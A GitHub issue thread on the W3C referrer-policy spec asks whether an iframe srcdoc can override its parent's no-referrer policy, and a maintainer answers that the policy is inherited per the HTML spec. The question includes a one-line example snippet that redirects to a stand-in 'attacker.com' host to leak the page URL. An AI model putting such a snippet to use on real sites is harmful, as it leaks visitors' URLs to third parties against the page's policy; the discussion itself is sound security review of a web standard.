How referrer policy deal with iframe srcdoc ?

w3c / webappsec-referrer-policy

WebAppSec Referrer Policy

https://w3c.github.io/webappsec-referrer-policy/

Other

26 stars 27 forks source link

How referrer policy deal with iframe srcdoc ? #116

Closed lnyzx closed 6 years ago

lnyzx commented 6 years ago

For example

<meta name="referrer" content="no-referrer">
<iframe srcdoc="<meta name='referrer' content='unsafe-url'><script>location.href='attacker.com'</script>"></iframe>

Should this iframe with a unsafe-url referrer policy inherits it's container's referrer policy or use it's own referrer policy? If use it's own, it will leak container's url which violates top frame's referrer policy

mikewest commented 6 years ago

Currently, we inherit the policy from the creator document in step 10 of https://html.spec.whatwg.org/#creating-a-new-browsing-context. That seems like the correct behavior, and avoids the hole you're pointing out.

Thanks!